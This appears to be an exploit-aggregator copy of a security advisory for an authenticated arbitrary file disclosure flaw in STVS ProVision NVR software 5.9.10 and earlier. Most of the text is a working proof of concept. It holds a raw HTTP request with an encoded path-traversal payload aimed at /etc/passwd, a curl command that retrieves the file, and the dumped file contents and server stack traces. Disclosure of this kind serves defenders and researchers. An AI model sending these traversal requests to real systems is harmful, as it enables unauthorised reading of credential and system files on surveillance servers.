Exploit for STVS ProVision 5.9.10 File Disclosure

Name: Exploit for STVS ProVision 5.9.10 File Disclosure
Rating: 5 (212 reviews)
2021-01-27 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:161157
STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability  
  
  
Vendor: STVS SA  
Product web page: http://www.stvs.ch  
Platform: Ruby  
Affected version: 5.9.10 (build 2885-3a8219a)  
5.9.9 (build 2882-7c3b787)  
5.9.7 (build 2871-a450938)  
5.9.1 (build 2771-1bbed11)  
5.9.0 (build 2701-6123026)  
5.8.6 (build 2557-84726f7)  
5.7  
5.6  
5.5  
  
Summary: STVS is a Swiss company specializing in development of  
software for digital video recording for surveillance cameras  
as well as the establishment of powerful and user-friendly IP  
video surveillance networks.  
  
Desc: The NVR software ProVision suffers from an authenticated  
arbitrary file disclosure vulnerability. Input passed through  
the files parameter in archive download script (archive.rb) is  
not properly verified before being used to download files. This  
can be exploited to disclose the contents of arbitrary and sensitive  
files.  
  
Tested on: Ubuntu 14.04.3  
nginx/1.12.1  
nginx/1.4.6  
nginx/1.1.19  
nginx/0.7.65  
nginx/0.3.61  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5623  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php  
  
19.01.2021  
  
--  
  
  
#1 LFI Prober (FP):  
-------------------  
  
GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1  
Host: 192.168.1.17  
Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"  
Accept: application/json, text/javascript, */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36  
Origin: http://192.168.1.17  
Referer: http://192.168.1.17/archive  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: last_stream=1; __flash__info=  
Connection: close  
  
HTTP/1.1 500 Not Found  
Server: nginx/1.4.6 (Ubuntu)  
Date: Mon, 18 Jan 2021 23:23:30 GMT  
Content-Type: text/html  
Content-Length: 2727  
Connection: close  
  
<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>  
  
  
#2 LFI Prober (Verified):  
-------------------------  
  
$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"  
  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
libuuid:x:100:101::/var/lib/libuuid:  
syslog:x:101:104::/home/syslog:/bin/false  
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false  
provision:x:999:107::/srv/provision/provision:/bin/bash  
stvs:x:1000:100::/home/stvs:/bin/bash  
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false  
ntp:x:104:108::/home/ntp:/bin/false  
messagebus:x:105:110::/var/run/dbus:/bin/false  
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin  
statd:x:107:65534::/var/lib/nfs:/bin/false  
  
  
--  
Errno::ENOENT No such file or directory - /var/www/index.html:  
  
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'  
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'  
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'